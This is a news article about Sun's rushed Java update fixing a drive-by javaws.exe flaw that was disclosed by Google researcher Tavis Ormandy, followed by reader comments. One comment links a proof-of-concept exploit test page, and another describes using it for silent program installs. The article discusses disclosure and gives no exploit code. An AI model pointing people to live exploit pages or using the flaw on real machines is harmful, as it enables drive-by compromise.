As attacks surface, Sun ships sudden Java patch
Summary: In a sudden about-face, Sun has rushed out a Java update to fix a drive-by download vulnerability that exposed Windows users to in-the-wild malware attacks.
In a sudden about-face, Sun has rushed out a Java update to fix a drive-by download vulnerability that exposed Windows users to in-the-wild malware attacks.
The patch comes less than a week after Sun told a Google researcher it did not consider the issue serious enough to warrant an out-of-cycle patch and less than a day after researchers spotted live exploits on a booby-trapped song lyrics Web site.
The release notes that accompanies the new Java 6 Update 20 makes no mention of the public flaw disclosure or subsequent attacks but I've been able to confirm that the patch does cover the vulnerability released by Google security researcher Tavis Ormandy.
[ SEE: Researcher warns of dangerous Java flaw ]
After applying the fix on a Windows machine, Ormandy's proof-of-concept demo did not work. Instead of opening the calculator application, I got an error message concerning the Java Virtual Machine Launcher:
The flaw, which was also discovered independently by Ruben Santamarta, occurs because the Java-Plugin Browser is running “javaws.exe” without validating command-line parameters.
Despite the absence of documentation, a researcher was about to figure out that Sun removed the code to run javaws.exe from the Java plugin.
Here is a link to download the patch from Sun's Web site.
[ SEE: Java zero-day flaw under active attack ]
The about-face by Sun is another sign that some big vendors still struggle to understand the importance of working closely with white hat researchers to understand the implications of certain vulnerabilities. In this case, Google's Ormandy was forced to use the full-disclosure weapon to force the vendor into a proper response.It's incomprehensible that a software vendor like Sun, now under Oracle's wings, could have misdiagnosed this vulnerability when Ormandy originally reported it. It was clear, from the inception, that this was a "critical" issue that was found by several different hackers. On Twitter, Ormandy said he had no information that the issue was already in the wild before he wielded the full-disclosure stick. However, he maintains "it was just too trivial for that not to be the case."
[ SEE: Responsible disclosure, the Microsoft way ]
To this date, Oracle Sun has not publicly commented or mentioned the public disclosure of an issue that's being actively exploited.Speaking of irresponsible, here's what I saw when I applied the new Java update this morning. Yes, checked by default. Sigh.
Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.
Talkback
They drag their heels* to the plate
* Heels in more ways than one.
Yay, Symantec!
YEA AVG
Gaxxis
Hmm, Symantec
RE: As attacks surface, Sun ships sudden Java patch
our speedy machines run like our beloved old IBM PC XT
did...slow.
Still, I'm happy to see the patch hit. Beats Adobe's
record
I can't find the link to down the fix
Don't be tricked about the Java version number.
Heads up!
Sun has a small (albeit important) correction to make.
Once you use the Java Control Panel to update, it says Version 20. However, when you install it and do "About," etc., It says Version 19.
In Add/Remove Programs it is listed as Version 20.
Small details do count.
rushed...
RE: As attacks surface, Sun ships sudden Java patch
lrfocke
Bing toolbar on Java update page
RE: As attacks surface, Sun ships sudden Java patch
test it
the link is:
http://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html
AVG is keeping me safe
AV devlopers are way faster to cover those vulnerabilities that the software makers.
Avast caught it
Yep..
Avast Pro v.5 definitely nailed that one!
RE: As attacks surface, Sun ships sudden Java patch
What I think is that this entire article and fuss is
all ado about nada. From what I have read in
earlier articles and posts this is all BS, designed
especially for the super tech types to weigh-in
and try to prove how much they think they
know.
This is all baloney. If it wasn't then every
swinging dick that is using Java on a windows
machine would be getting their ass kicked, and
it would be media central because every
reporter on the planet would be getting
affected.
In other words, STFU.
?????????????????????
the demo in the article proves it can launch an arbitrary executable on any vulnerable machine just by visiting the page. that alone is a critical security failure. for my own testing in a private environment, i confirmed that pretty much anything is open, including a silent background download and installation of whatever program i chose, completely without prompting of any kind, just by visiting the page.
what does bing has to do with java?
great...
Sun... sorry Oracle decided to include Bing search bar(and like every other crapware it's checked by default...) instead of the google bar(which was also checked by default like every other crapware)...
It was a Java vulnerability... not a MS vulnerability... they just want to try to install crapware at the same time...
crapware